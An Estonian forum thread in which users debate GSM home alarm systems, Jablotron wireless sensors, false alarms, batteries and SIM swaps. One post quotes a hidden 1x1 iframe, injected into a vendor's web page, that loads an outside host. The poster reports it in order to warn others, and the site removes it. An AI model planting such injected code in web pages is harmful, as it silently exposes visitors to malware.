gsm valve

siia käivad üldised teemad, mis teistesse foorumitesse ei sobi
Tehnik
Uus kasutaja
Uus kasutaja
Postitusi: 2
Liitunud: 16 Juul 2008, 20:33

Re: gsm valve

Lugemata postitus Postitas Tehnik »

GSM valvest niipalju,,et mina seda endale ei taha ja ka ei paneks siis kui tasuta saaks..Sellega kaasneb hulga probleeme ja raskusi edaspidi.Toon näiteid,,1ks patarei tyhjenemisel tekib valehäireid(kuigi programm näitab et, andur ok) 2ks Ei ole midagi imestada kui kõik andurid ytlevad ülesse,,,(korraliku äikese korral),,,Piisab vaid sellestki kui 1 andur saba annab ja sa ei saa enam kogu objekti valvestad.Ja nii neid jamasi võib loetleda piisavalt, et seda mitte tahta. Tean seda väita kuna olen ise nõrkvoolu tehnik.

Samas pakun vastavalt vajadustele ka ise lahendusi,kui kellegil abi vaja andku tulla
skip128
Korralik postitaja
Korralik postitaja
Postitusi: 264
Liitunud: 04 Veebr 2008, 12:52
On tänatud: 6 korda

Re: gsm valve

Lugemata postitus Postitas skip128 »

No lase käia. Paku üks juhtmevaba lahendus 1,5 kordsele majale.
jan
-
Postitusi: 964
Liitunud: 08 Mai 2006, 22:27
On tänanud: 24 korda
On tänatud: 15 korda

Re: gsm valve

Lugemata postitus Postitas jan »

Tehniku toodud puudused kehtivad ju kõikidel juhtmevabadel süsteemidel. Teoorias muidugi võiksid kallimad seadmed olla targemad, kui need Jablotroni omad ning lubada tühja patareiga / vigast andurit kergemini tuvastada ning seda vajadusel ka süsteemist välja lülitada (kui tõesti pole uut patareid kohe sisse panna ning täiesti ilma valveta ei soovi jätta).

Seda äikese juttu muidugi hästi ei usu. Kui äike suudab juhtmevaba andurit rivist välja viia, siis veel kindlamini suudab ta rivist välja viia juhtmetega andurid, kus peaks äikese poolt tekitatav elektriväli veel paremini indutseeruma. Tõenäolisem on see, et äike võib löögi ajal segada sagedust, üle mille andurid suhtlevad ning keskus võib seda võtta kui sabotaazhikatset.
dumbuser
Ehituspenskar
Ehituspenskar
Postitusi: 3777
Liitunud: 08 Jaan 2008, 23:08
On tänanud: 11 korda
On tänatud: 79 korda

Re: gsm valve

Lugemata postitus Postitas dumbuser »

Ma nüüd juhtusin ka tehniku juttu lugema. Vinge värk, mis muud. Kui selliste võimalustega süsteem käima pannakse siis on see juba vigaselt tehtud asi, mitte halvasti töötav süsteem. Need vähesed millega mina olen siiani kokku puutunud suudavad iga anduri kohta anda vähemalt 4 olekut. Valves/häires/toide madal või puudu/tamperahela viga... Kui süsteem ei suuda selliseidki vigasid iseendas ära tunda siis on ta lihtsalt vilets asi. GSM on lihtsalt häire edastamise kanal. Iga süsteemi võib sellega tööle panna. Telefonitraadi või mingi raadiosagedusega saab sama töö ära teha. On see GSM siis kohe sitt asi ? Või sain ma millestki valesti aru ? GSM puhul on lihtsalt häire sinuni jõudmise teekond oluliselt lihtsam, kuna mobla on praegu vist pea kõigil olemas. Kui aga hakata uurima seda, millisel juhul on võimalik häireteadet kõige lihtsam "ära koristada" siis on igal süsteemi oma puudused ja parima tulemuse saab mitme asja kokkupanemisel.
aivar00
Korralik postitaja
Korralik postitaja
Postitusi: 253
Liitunud: 23 Nov 2007, 20:33
On tänatud: 3 korda

Re: gsm valve

Lugemata postitus Postitas aivar00 »

Nagu näha siis reaalseid kasutajaid kommijate seas ei paista kahjuks olema. Selle "ainuesindaja" mõiste võib ära unustada... Oleme euroliidus ja suva kaupmees võib minna nn. tehase hulgilattu ning osta seadmeid kuis rahakott lubab. Analoogne lugu ka litsensi nõudva relvamüügiga- ainuesindajaid enam ei ole...(see asjandus sellest aastast peaks toimima).
Ise kaalunud asja paigaldamist üle aasta. Viimane kokkupuude oli tuttava pooleliolevas suvilas. Väidetavalt õhuniiskusest andis pidevalt valehäiret. GSM- mehed olevat öelnud- niiskuse viga ja enne ei saagi asja käima kui maja kuivaks saab...
Keda nüüd uskuda- kas GSM-mehi- saab panna valvesse kasvõi eraldiseisvat puukuuri või tuttavat kes lepingu ära lõpetas kuna asja korralikult toimima ei saadud :confused:
dumbuser
Ehituspenskar
Ehituspenskar
Postitusi: 3777
Liitunud: 08 Jaan 2008, 23:08
On tänanud: 11 korda
On tänatud: 79 korda

Re: gsm valve

Lugemata postitus Postitas dumbuser »

No räägime siis veelkord, et GSM on ainult sidepidamisahel. Häireid ta ei loe. Ta annab ainult infot edasi. Võib tõesti olla, et ta on nii integreeritud, et laiali ei saagi lammutada. Niiskusejutt on küll möla. Võiks siis juba asjalikuma anduri panna, kuhu niiskus ligi ei pääse. Või siis töö hoolikamalt teha. Aga kuna need asjalikumad maksavad rohkem siis ei hakka neid üks eesti ärimees iialgi otsima ega paigaldama. Ise kasutasin seda GSM lahendust mis jablotron pakkus ja ei oska küll kurta. Kõiki saadetavaid SMS tekste sai muuta selliseks nagu ise tahtsid ja ma sain täpselt teada mis kell keegi midagi valvesse pani või valvest maha võttis. Kaua elekter ära oli või millise nivooga on moblalevi. Varsti hakkan jälle kasutama. Aga mis teated ja kui palju, see sõltub juba sellest, kui võimekas on valvekeskus. Kuna ma pole valmis lahendustega kokku puutunud siis ei oska ka kiita/laita. Muide moblaga saab ka sauna juhtida. Helistad ainult naisele ja see panebki sauna käima.
Tehnik
Uus kasutaja
Uus kasutaja
Postitusi: 2
Liitunud: 16 Juul 2008, 20:33

Re: gsm valve

Lugemata postitus Postitas Tehnik »

Loodan .et pandi ikka tähele seda lauseosa,Mina seda ei ostaks!!!!Vaatan,et paljud asjaga kursis.Esitaksin küsimuse.Miks annab juhtmevaba andur häire,kui omanik paneb maja valvesse ning istub oma mustangi ja peale esimest käivatamist hakkab signa karjuma :D ,,Häire ei tule aind 1 andurist vaid erinevatest.
Kuna jutt läks mobla võimalustele ,siis sellega annab palju teha.Valvesse/Maha objekti.yks puha mis asja käima panna,N:Saunaahi.Ja palju muud.
Tehnikahuviline
külaline

Re: gsm valve

Lugemata postitus Postitas Tehnikahuviline »

Miks ei ostaks ?

Kõik ülal kirjutajad ei ole kunagi kasutanud ja ajavad ju lolli juttu ?

JAblotroni koduvalve süsteemid on parimad mis turul täna pakkuda on.

Igaüks võib sama asja osta ja ise üles panna Oomipoest näiteks !

Väga VINGE värk, olen seda näppinud.
Kala-mees
külaline

Re: gsm valve

Lugemata postitus Postitas Kala-mees »

Ostke, või ärge ostke. Kasutage või ärge kasutage. Puudusi on kõikidel süsteemidel. Aga kõige suuremaks puuduseks on GSMvalve ise ja teadmatud tehnikud. Oskavad vaid ilusat juttu suust välja ajada. Juba ainuüksi väide, et vaid nende SIM-kaart on Elisa GSM-võrgus prioriteet nr.1, mis saadab koheselt häireteate mobiilile. :D Selle jablotroni juhtmevabade andurite miinuseks on patareide kasutamine. On juhtumeid, kus patareid surevad äkiliselt, mingit tagasisidet andmata ja siis klient heausklikult loodab süsteemi tööle. Ja kui tehakse elamine tühjaks või põleb maha, siis kes vastutab. Igatahes mitte GSMvalve. Siis on süüdi klient, kes tehnikut mitte iga kuu enda juurde patareisid testima/vahetama kutsu. Andurid peaks korrasolekusignaali saatma kas iga 5 või 1 minuti tagant. Suitsuandurid seda igatahes ei tee. Ja oleks veel kui palju antud teemal rääkida.

Pigem oleks see Jablotroni valvesüsteem rohkem inimestele, kellel on tehnilist taipu.
Kala-mees
külaline

Re: gsm valve

Lugemata postitus Postitas Kala-mees »

Tehnik kirjutas:Miks annab juhtmevaba andur häire,kui omanik paneb maja valvesse ning istub oma mustangi ja peale esimest käivatamist hakkab signa karjuma :D ,,Häire ei tule aind 1 andurist vaid erinevatest.
Annan omapoolse vastuse.
Anduri asukoht vale, läheduses soojaallikas või ventilatsioon (õhu värelus), kodus lemmikloom rott ja rotist suurem loom.
Tamperhäire korral - anduri alus on pinges (sein kõver, kruvid liiga pingul), andur korralikult kinnitamata.
Elektrooniliste seadmete lähedus. Andur lihtsalt vigasest partiist.
Härra
külaline

Re: gsm valve

Lugemata postitus Postitas Härra »

Ostsin Tevalost esimese Jablo keskuse 1999.a. ja panin ise käima. Töötab tänaseni. Peale seda olen paljudele tuttavatele soovitnud, aidanud panna ülesse erinevaid mudeleid. Patareid on vaja vahetada iga aasta ja enne talve tulekut, just külmadesse kõrvalhoonetesse. Kasutada tuleb ainult alcaline tehnoloogia patareisid. Igasugused super-hüper patareid ei pane aastat vastu. Ainult ALCALINE. Tootja polegi oluline. :hello:
Külaline
külaline

Re: gsm valve

Lugemata postitus Postitas Külaline »

:D olen ise lääne-virumaalt ja gsm valvest nii palju ,et pakuti ehituspoes.no olgu ega mööda külge maha ei jookse, kui teevad hinna pakkumise.poes ajas müügijuhist tibi hullu juttu ,et tehnik tuleb kohale vaatab objekti üle ja pakub hinna,olin nöus, mis seal ikka.läks nädal kaks ei kedagi ega midagi.helistasin gsm valvesse,et ootan hinna pakkumist,nemad ,et oi lähi päevadel saadame aga hinna pakkumise eest tahame 700 kr,siis saatsin nad pikalt :evil: nemad määrivad mulle valvet peale ja lõpuks tahavad 700 kr selle eest,huvitav oli see ,et tibi poes köneles hinna pakkumine ja kohal objektil käimine esimesel korral on tasuta :?: saa sa nüüd aru.ei vötnud ma g4s ega gsm valvet vaid berhandiini ning asi toimib väga hästi.
dumbuser
Ehituspenskar
Ehituspenskar
Postitusi: 3777
Liitunud: 08 Jaan 2008, 23:08
On tänanud: 11 korda
On tänatud: 79 korda

Re: gsm valve

Lugemata postitus Postitas dumbuser »

Pmst on eelmise kodaniku lähenemine õige. Koera puhul on vbl valvesüsteemi eest hoolitsemist liiga tihedalt. No, et toide oleks olemas ja aegajalt peab treenima (jalutama ja mängima jne). Samas on suur pluss see, et sa saad mitu asja korraga. Minu puhul jääb see võimalus hetkel ära, kuna ma viibin kodus suhteliselt vähe ja sel juhul oleks koer lihtsalt vang. Aga kui see eelmine põhjus kunagi ära langeb siis hakkan ka sellist valvesüsteemi kasutma.
jannos
Regulaarpostitaja
Regulaarpostitaja
Postitusi: 83
Liitunud: 21 Dets 2006, 21:28

Re: gsm valve

Lugemata postitus Postitas jannos »

emt-l on spetsiaalne valvepakett 29kr. kuus. Võib olla on ka teistel operaatoritel sarnaseid pakette.
valvur
külaline

Re: gsm valve

Lugemata postitus Postitas valvur »

Ma arvan, et teete tühjast tähjast palju kära:
Õnneks on GSM valvele veel konkurente tekkinud - tutkisin asja ja süsteemi loogika on küll natuke erinev (pole sõrmistikku) aga kellel seda ikka vaja läheb, sest ega keegi enam autot ka võtmest ei ava kõik käib ju puldiga. Pole veel otsustanud, aga arvan, et võtan Hiinaka ära ja see pole auto mis kulub - nikuinii tehakse kõik tehnika juba seal :)
Aga infoks vaadake ja kel nendega kogemusi, siis ärge hoidke ennast tagasi...
http://sisus.ee/gsmvalve/
http://www.salasilm.ee/index.php?id=72
Antskan Toss
külaline

Re: gsm valve

Lugemata postitus Postitas Antskan Toss »

On ikka kindel, et mu GSM Valve komplekt töötab edasi kui nende sim-kaardi välja viskan (ja neile tagastan) ning suvalise simpel-diili sinna asemele panen?
aivar00
Korralik postitaja
Korralik postitaja
Postitusi: 253
Liitunud: 23 Nov 2007, 20:33
On tänatud: 3 korda

Re: gsm valve

Lugemata postitus Postitas aivar00 »

Egas sul kaart süsteemi töökorras hoia. Lihtsalt nende kaardiga maksad neile endile mingit "hooldusraha". Kui aga ise "nuti" oled ja oskad süsteemi kontrollida ei ole seda firmat koos kaardiga sinna vahele üldse vaja.
Kasutaja avatar
rokikas
Ehituspenskar
Ehituspenskar
Postitusi: 6924
Liitunud: 30 Jaan 2005, 15:38
Asukoht: Saue
On tänanud: 227 korda
On tänatud: 231 korda

Re: gsm valve

Lugemata postitus Postitas rokikas »

valvur kirjutas:Ma arvan, et teete tühjast tähjast palju kära:
Õnneks on GSM valvele veel konkurente tekkinud - tutkisin asja ja süsteemi loogika on küll natuke erinev (pole sõrmistikku) aga kellel seda ikka vaja läheb, sest ega keegi enam autot ka võtmest ei ava kõik käib ju puldiga. Pole veel otsustanud, aga arvan, et võtan Hiinaka ära ja see pole auto mis kulub - nikuinii tehakse kõik tehnika juba seal :)
Aga infoks vaadake ja kel nendega kogemusi, siis ärge hoidke ennast tagasi...
http://sisus.ee/gsmvalve/
http://www.salasilm.ee/index.php?id=72
Millegipärast salasilma lehele minnes hakkab viirustõrje karjuma. Kas probleem ainult minul.
Külaline
külaline

Re: gsm valve

Lugemata postitus Postitas Külaline »

Salasilmal jah viirus sees.
Kel ei näita viirust sel viirus töös.
dumbuser
Ehituspenskar
Ehituspenskar
Postitusi: 3777
Liitunud: 08 Jaan 2008, 23:08
On tänanud: 11 korda
On tänatud: 79 korda

Re: gsm valve

Lugemata postitus Postitas dumbuser »

Misasjaga tegu on ? Mul on vaikimis kõik cookied, javad ja flash'id keelatud ja ei näita mingit hoiatust.
2korda2
-
Postitusi: 1371
Liitunud: 03 Apr 2006, 13:36
Asukoht: Tartumaa
On tänanud: 58 korda
On tänatud: 63 korda

Re: gsm valve

Lugemata postitus Postitas 2korda2 »

Viimane rida lehekülje koodis ei tohiks seal ilmselt olla (NB! ära näpi, kui ei tea, mis teed):
<iframe src="http://webexperience13.com/?click=5425640" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Saadetud ka mail info@salasilm.ee

MUUDETUD 15.12.2008 16.01:
Salasilmalt kiire reageering - lehelt koodijupp kadunud ja saadetud kirjale ka vastus olemas :thumbsup:
-------
"You're working hard, I'm not, and in 100 years, we'll both be dead." - Wally
xxNIMETUxx
Ehitusguru
Ehitusguru
Postitusi: 823
Liitunud: 24 Jaan 2006, 16:14
Asukoht: Tartu ja kogu Eesti
On tänanud: 2 korda
On tänatud: 4 korda

Re: gsm valve

Lugemata postitus Postitas xxNIMETUxx »

tulen ka siis teemasse tagasi. mul oleks vaja siis gsm valvet kus oleks ainult üks liikumis ja suitsuandur. huvi ei oleks käia välja hirmsat pappi ja pole vaja ka raadioteel andureid. peamine on see, et signaal minuni jõuaks. läheb siis garaazi kasutamiseks.
on kellegil pakkuda siis odavalt midagi?
vee- ja küttesüsteemid, ventilatsioon, soojuspumbad, elekter, kodumasinad/seadmed: müük, projekteerimine, hooldus, remont 58367067 spegrupp@gmail.com
Reevo
Korralik postitaja
Korralik postitaja
Postitusi: 150
Liitunud: 08 Dets 2008, 18:48
On tänanud: 1 kord
On tänatud: 4 korda

Re: gsm valve

Lugemata postitus Postitas Reevo »

Et siis nende sim seest välja ja enda oma asemele ja kõik ok või oskab keegi öelda kuidas seda lihtsalt ümber teha minul gsm valve juba pea 2 aastat tuksub. Raha nad küsida oskavad.
http://www.eestipuitmaja.ee
www.polüuretaanvaht.ee
PUR vahuga soojustamine ja termograafia teenused.
aivar00
Korralik postitaja
Korralik postitaja
Postitusi: 253
Liitunud: 23 Nov 2007, 20:33
On tänatud: 3 korda

Re: gsm valve

Lugemata postitus Postitas aivar00 »

Kuidas siis selle 2 aasta jooksul on valve toiminud? Kas annab tihti valehäiret ja patareid saavad tühjaks. Nimelt endale käib müügimees juba pikka aega pinda, et paneme. Samas aga vastakaid arvamusi kole palju ning seetõttu ei olegi veel otsustanud.
Reevo
Korralik postitaja
Korralik postitaja
Postitusi: 150
Liitunud: 08 Dets 2008, 18:48
On tänanud: 1 kord
On tänatud: 4 korda

Re: gsm valve

Lugemata postitus Postitas Reevo »

Minul pole õnneks valehäireid olnud aga vale arveid kahjuks küll aga need on ka lahenenud õnneks :D
Aga saab siis sinna sisse enda simmi toppida või mitte.
http://www.eestipuitmaja.ee
www.polüuretaanvaht.ee
PUR vahuga soojustamine ja termograafia teenused.
Vasta